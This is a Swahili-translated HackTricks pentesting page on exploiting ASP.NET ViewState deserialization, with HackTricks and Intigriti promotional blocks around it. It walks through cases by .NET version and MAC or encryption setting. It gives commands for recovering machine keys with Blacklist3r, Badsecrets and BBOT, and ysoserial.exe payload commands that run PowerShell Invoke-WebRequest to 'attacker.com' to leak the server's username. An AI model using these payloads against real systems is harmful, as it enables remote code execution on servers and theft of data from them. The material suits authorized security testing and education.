hacktricks/pentesting-web/deserialization/exploiting-__viewstate-parameter.md

# Kudanganya \_\_VIEWSTATE bila kujua siri

<details>

<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.

</details>

<figure><img src="../../.gitbook/assets/i3.png" alt=""><figcaption></figcaption></figure>

**Mwongozo wa tuzo ya mdudu**: **jiandikishe** kwa **Intigriti**, jukwaa la **tuzo za mdudu za malipo lililoundwa na wadukuzi, kwa wadukuzi**! Jiunge nasi kwenye [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) leo, na anza kupata tuzo hadi **$100,000**!

{% embed url="https://go.intigriti.com/hacktricks" %}

## Ni nini ViewState

**ViewState** hutumika kama mbinu ya msingi katika ASP.NET kudumisha data ya ukurasa na udhibiti kwenye kurasa za wavuti. Wakati wa kurekebisha HTML ya ukurasa, hali ya sasa ya ukurasa na thamani za kuhifadhiwa wakati wa postback zinahifadhiwa kwenye mizizi iliyosimbwa kwa msingi wa base64. Vizuri hivi hutolewa kwenye maeneo ya ViewState yaliyofichwa.

Maelezo ya ViewState yanaweza kuchorwa na mali zifuatazo au mchanganyiko wao:

* **Base64**:
* Muundo huu hutumiwa wakati sifa za `EnableViewStateMac` na `ViewStateEncryptionMode` zote zimewekwa kama uwongo.
* **Base64 + MAC (Message Authentication Code) Imewezeshwa**:
* Kuwezesha MAC kunafikiwa kwa kuweka sifa ya `EnableViewStateMac` kuwa kweli. Hii hutoa uthibitisho wa uadilifu kwa data ya ViewState.
* **Base64 + Imesimbwa**:
* Ufichaji unatumika wakati sifa ya `ViewStateEncryptionMode` inawekwa kuwa kweli, ikidumisha usiri wa data ya ViewState.

## Kesi za Majaribio

Picha ni jedwali linaloelezea miundo tofauti ya ViewState katika ASP.NET kulingana na toleo la mfumo wa .NET. Hapa kuna muhtasari wa yaliyomo:

1. Kwa **toleo lolote la .NET**, wakati MAC na Ufichaji wote wamelemazwa, MachineKey haihitajiki, na hivyo hakuna njia inayofaa ya kuigundua.
2. Kwa **toleo chini ya 4.5**, ikiwa MAC imewezeshwa lakini Ufichaji sio, MachineKey inahitajika. Njia ya kuigundua MachineKey inaitwa "Blacklist3r."
3. Kwa **toleo chini ya 4.5**, bila kujali ikiwa MAC imewezeshwa au la, ikiwa Ufichaji umewezeshwa, MachineKey inahitajika. Kuigundua MachineKey ni kazi ya "Blacklist3r - Maendeleo ya Baadaye."
4. Kwa **toleo 4.5 na zaidi**, mchanganyiko wote wa MAC na Ufichaji (iwe wote ni kweli, au moja ni kweli na nyingine sio) inahitaji MachineKey. MachineKey inaweza kugunduliwa kwa kutumia "Blacklist3r."

### Kesi ya Jaribio: 1 – EnableViewStateMac=false na viewStateEncryptionMode=false

Pia ni rahisi kulemaza kabisa ViewStateMAC kwa kuweka funguo ya usajili ya `AspNetEnforceViewStateMac` kuwa sifuri katika:
```
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v{VersionHere}
```
**Kutambua Atributi za ViewState**

Unaweza jaribu kutambua ikiwa ViewState inalindwa na MAC kwa kuchukua ombi lenye parameter hili kwa kutumia BurpSuite. Ikiwa Mac haikutumika kulinda parameter unaweza kuitumia kwa kuitumia [**YSoSerial.Net**](https://github.com/pwntester/ysoserial.net)
```
ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName"
```
### Kesi ya majaribio 1.5 - Kama Kesi ya majaribio 1 lakini kuki ya ViewState haikutumwa na seva

Wabunifu wanaweza **kuondoa ViewState** isitumike kama sehemu ya Ombi la HTTP (mtumiaji hataipokea kuki hii).\
Mtu anaweza kudhani kwamba ikiwa **ViewState** haipo, utekelezaji wao ni **salama** kutokana na hatari yoyote inayoweza kutokea na deserialization ya ViewState.\
Hata hivyo, hilo sio jambo la kweli. Ikiwa tut **ongeza parameter ya ViewState** kwenye mwili wa ombi na kutuma mzigo uliosanidiwa wetu kwa kutumia ysoserial, bado tutaweza kufikia **utekelezaji wa nambari** kama ilivyoonyeshwa katika **Kesi 1**.

### Kesi ya Majaribio: 2 - .Net < 4.5 na EnableViewStateMac=true & ViewStateEncryptionMode=false

Ili **kuwezesha ViewState MAC** kwa **ukurasa maalum** tunahitaji kufanya mabadiliko yafuatayo kwenye faili maalum ya aspx:
```bash
<%@ Page Language="C#" AutoEventWireup="true" CodeFile="hello.aspx.cs" Inherits="hello" enableViewStateMac="True"%>
```
Tunaweza pia kufanya hivyo kwa maombi ya **jumla** kwa kuweka kwenye faili ya **web.config** kama inavyoonyeshwa hapa chini:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.web>
<customErrors mode="Off" />
<machineKey validation="SHA1" validationKey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45" />
<pages enableViewStateMac="true" />
</system.web>
</configuration>
```
Kwa kuwa parameter hulindwa na MAC wakati huu ili kutekeleza shambulizi kwa mafanikio kwanza tunahitaji kutumia [**Blacklist3r(AspDotNetWrapper.exe)**](https://github.com/NotSoSecure/Blacklist3r/tree/master/MachineKey/AspDotNetWrapper) kupata ufunguo uliotumiwa.
```
AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata /wEPDwUKLTkyMTY0MDUxMg9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRkbdrqZ4p5EfFa9GPqKfSQRGANwLs= --decrypt --purpose=viewstate --modifier=6811C9FF --macdecode --TargetPagePath "/Savings-and-Investments/Application/ContactDetails.aspx" -f out.txt --IISDirPath="/"

--encrypteddata : __VIEWSTATE parameter value of the target application
--modifier : __VIWESTATEGENERATOR parameter value
```
[**Badsecrets**](https://github.com/blacklanternsecurity/badsecrets) ni chombo kingine kinachoweza kutambua machineKeys za kujulikana. Imeandikwa kwa Python, hivyo tofauti na Blacklist3r, hakuna tegemezi la Windows. Kwa viewstates za .NET, kuna zana ya "python blacklist3r", ambayo ni njia ya haraka zaidi ya kutumia. 

Inaweza kutolewa na viewstate na jenereta moja kwa moja:
```
pip install badsecrets
git clone https://github.com/blacklanternsecurity/badsecrets
cd badsecrets
python examples/blacklist3r.py --viewstate /wEPDwUJODExMDE5NzY5ZGQMKS6jehX5HkJgXxrPh09vumNTKQ== --generator EDD8C9AE
```
![https://user-images.githubusercontent.com/24899338/227034640-662b6aad-f8b9-49e4-9a6b-62a5f6ae2d60.png](https://user-images.githubusercontent.com/24899338/227034640-662b6aad-f8b9-49e4-9a6b-62a5f6ae2d60.png)

Au, inaweza kuunganisha moja kwa moja kwenye URL ya lengo na kujaribu kukata viewstate kutoka kwa HTML:
```
pip install badsecrets
git clone https://github.com/blacklanternsecurity/badsecrets
cd badsecrets
python examples/blacklist3r.py --url http://vulnerablesite/vulnerablepage.aspx
```
![https://user-images.githubusercontent.com/24899338/227034654-e8ad9648-6c0e-47cb-a873-bf97623a0089.png](https://user-images.githubusercontent.com/24899338/227034654-e8ad9648-6c0e-47cb-a873-bf97623a0089.png)

Kutafuta viewstates zenye kasoro kwa kiwango kikubwa, kwa kushirikiana na uchambuzi wa subdomain, moduli ya `badsecrets` [**BBOT**](exploiting-\_\_viewstate-parameter.md) inaweza kutumika:
```
bbot -f subdomain-enum -m badsecrets -t evil.corp
```
![https://user-images.githubusercontent.com/24899338/227028780-950d067a-4a01-481f-8e11-41fabed1943a.png](https://user-images.githubusercontent.com/24899338/227028780-950d067a-4a01-481f-8e11-41fabed1943a.png)

Ikiwa una bahati na ufunguo unapatikana, unaweza kuendelea na shambulio kwa kutumia [**YSoSerial.Net**](https://github.com/pwntester/ysoserial.net)**:**
```
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName" --generator=CA0B0334 --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45"

--generator = {__VIWESTATEGENERATOR parameter value}
```
Katika kesi ambapo parameter `_VIEWSTATEGENERATOR` **haikutumwa** na server huenda **hauitaji** kutoa parameter `--generator` **lakini hizi**:
```bash
--apppath="/" --path="/hello.aspx"
```
### Kesi ya Majaribio: 3 – .Net < 4.5 na EnableViewStateMac=true/false na ViewStateEncryptionMode=true

Katika hii haijulikani ikiwa parameter imekingwa na MAC. Kisha, thamani labda imefichwa na utahitaji **Machine Key** kuweza kuficha mzigo wako ili kutumia udhaifu.

**Katika kesi hii** [**Blacklist3r**](https://github.com/NotSoSecure/Blacklist3r/tree/master/MachineKey/AspDotNetWrapper) **moduli iko chini ya maendeleo...**

**Kabla ya .NET 4.5**, ASP.NET inaweza **kukubali** \_`__VIEWSTATE`\_parameter **bila** **kuwa** **imefichwa** kutoka kwa watumiaji **hata** kama **`ViewStateEncryptionMode`** imewekwa kuwa _**Always**_. ASP.NET **inaangalia** tu **uwepo** wa **parameter ya** **`__VIEWSTATEENCRYPTED`** katika ombi. **Ikiwa mtu ataondoa parameter hii, na kutuma mzigo usiofichwa, bado utashughulikiwa.**

Hivyo basi ikiwa wachomaji wanapata njia ya kupata Machinekey kupitia udhaifu mwingine kama vile upitishaji wa faili, amri ya [**YSoSerial.Net**](https://github.com/pwntester/ysoserial.net) iliyotumiwa katika **Kesi 2**, inaweza kutumika kufanya RCE kwa kutumia udhaifu wa deserialization ya ViewState.

* Ondoa parameter ya `__VIEWSTATEENCRYPTED` kutoka kwa ombi ili kutumia udhaifu wa deserialization ya ViewState, vinginevyo itarudisha kosa la uthibitisho wa Viewstate MAC na udhaifu utashindwa.

### Kesi ya Majaribio: 4 – .Net >= 4.5 na EnableViewStateMac=true/false na ViewStateEncryptionMode=true/false isipokuwa sifa zote mbili kuwa za uwongo

Tunaweza kulazimisha matumizi ya mfumo wa ASP.NET kwa kufafanua parameter ifuatayo ndani ya faili ya web.config kama inavyoonyeshwa hapa chini.
```xml
<httpRuntime targetFramework="4.5" />
```
Vinginevyo, hii inaweza kufanywa kwa kufafanua chaguo lifuatalo ndani ya paramita ya `machineKey` ya faili ya web.config.
```bash
compatibilityMode="Framework45"
```
Kama ilivyokuwa hapo awali **thamani imefichwa.** Kisha, ili kutuma **mzigo sahihi, muhalifu anahitaji ufunguo**.

Unaweza kujaribu kutumia [**Blacklist3r(AspDotNetWrapper.exe)**](https://github.com/NotSoSecure/Blacklist3r/tree/master/MachineKey/AspDotNetWrapper) kwa kutafuta ufunguo unaotumiwa:
```
AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata bcZW2sn9CbYxU47LwhBs1fyLvTQu6BktfcwTicOfagaKXho90yGLlA0HrdGOH6x/SUsjRGY0CCpvgM2uR3ba1s6humGhHFyr/gz+EP0fbrlBEAFOrq5S8vMknE/ZQ/8NNyWLwg== --decrypt --purpose=viewstate  --valalgo=sha1 --decalgo=aes --IISDirPath "/" --TargetPagePath "/Content/default.aspx"

--encrypteddata = {__VIEWSTATE parameter value}
--IISDirPath = {Directory path of website in IIS}
--TargetPagePath = {Target page path in application}
```
Kwa maelezo zaidi kuhusu IISDirPath na TargetPagePath [rejea hapa](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)

Au, kwa kutumia [**Badsecrets**](https://github.com/blacklanternsecurity/badsecrets) (na thamani ya jenereta):
```bash
cd badsecrets
python examples/blacklist3r.py --viewstate JLFYOOegbdXmPjQou22oT2IxUwCAzSA9EAxD6+305e/4MQG7G1v5GI3wL7D94W2OGpVGrI2LCqEwDoS/8JkE0rR4ak0= --generator B2774415
```
![https://user-images.githubusercontent.com/24899338/227043316-13f0488f-5326-46cc-9604-404b908ebd7b.png](https://user-images.githubusercontent.com/24899338/227043316-13f0488f-5326-46cc-9604-404b908ebd7b.png)

Baada ya kutambua funguo ya Mashine halali, **hatua inayofuata ni kuzalisha mzigo uliosimbwa kwa kutumia** [**YSoSerial.Net**](https://github.com/pwntester/ysoserial.net)
```
ysoserial.exe -p ViewState  -g TextFormattingRunProperties -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName" --path="/content/default.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="F6722806843145965513817CEBDECBB1F94808E4A6C0B2F2"  --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45"
```
Ikiwa una thamani ya `__VIEWSTATEGENERATOR` unaweza **jaribu kutumia** parameter ya `--generator` na thamani hiyo na **kupuuza** paramita za `--path` na `--apppath`

![](https://notsosecure.com/sites/all/assets/group/nss\_uploads/2019/06/4.2.png)

Udanganyifu mafanikio wa udhaifu wa deserialization wa ViewState utasababisha ombi la nje ya mpangilio kwenye seva inayodhibitiwa na mshambuliaji, ambayo inajumuisha jina la mtumiaji. Aina hii ya udanganyifu inadhihirishwa katika uthibitisho wa dhana (PoC) ambao unaweza kupatikana kupitia rasilimali iliyo na jina "Exploiting ViewState Deserialization using Blacklist3r and YsoSerial.NET". Kwa maelezo zaidi juu ya jinsi mchakato wa udanganyifu unavyofanya kazi na jinsi ya kutumia zana kama Blacklist3r kwa kutambua MachineKey, unaweza kupitia [PoC ya Udanganyifu Mafanikio](https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/#PoC) iliyotolewa.

### Kesi ya Majaribio 6 – ViewStateUserKeys inatumika

Mali ya **ViewStateUserKey** inaweza kutumika kwa **kujilinda** dhidi ya **mshambulizi wa CSRF**. Ikiwa funguo kama hiyo imefafanuliwa katika programu na jaribu kuzalisha mzigo wa **ViewState** na njia zilizojadiliwa hadi sasa, **mzigo hautasindika na programu**.\
Unahitaji kutumia paramita moja zaidi ili kuunda kwa usahihi mzigo:
```bash
--viewstateuserkey="randomstringdefinedintheserver"
```
### Matokeo ya Ufanisi wa Uchomaji <a href="#poc" id="poc"></a>

Kwa kila kesi ya majaribio, ikiwa mzigo wa ViewState wa YSoSerial.Net unafanya kazi **kwa mafanikio** basi server itajibu na "**Hitilafu ya seva ya ndani ya 500**" ikiwa na maudhui ya jibu "**Taarifa ya hali ni batili kwa ukurasa huu na inaweza kuwa imeharibika**" na tutapata ombi la OOB.

Angalia kwa [maelezo zaidi hapa](https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/)

## Marejeo

* [**https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/**](https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/)
* [**https://medium.com/@swapneildash/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817**](https://medium.com/@swapneildash/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817)
* [**https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/**](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)
* [**https://blog.blacklanternsecurity.com/p/introducing-badsecrets**](https://blog.blacklanternsecurity.com/p/introducing-badsecrets)

<figure><img src="../../.gitbook/assets/i3.png" alt=""><figcaption></figcaption></figure>

**Mwongozo wa tuzo ya mdudu**: **Jisajili** kwa **Intigriti**, jukwaa la tuzo za mdudu la malipo lililoundwa na wadukuzi, kwa wadukuzi! Jiunge nasi kwenye [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) leo, na anza kupata tuzo hadi **$100,000**!

{% embed url="https://go.intigriti.com/hacktricks" %}

<details>

<summary><strong>Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.

</details>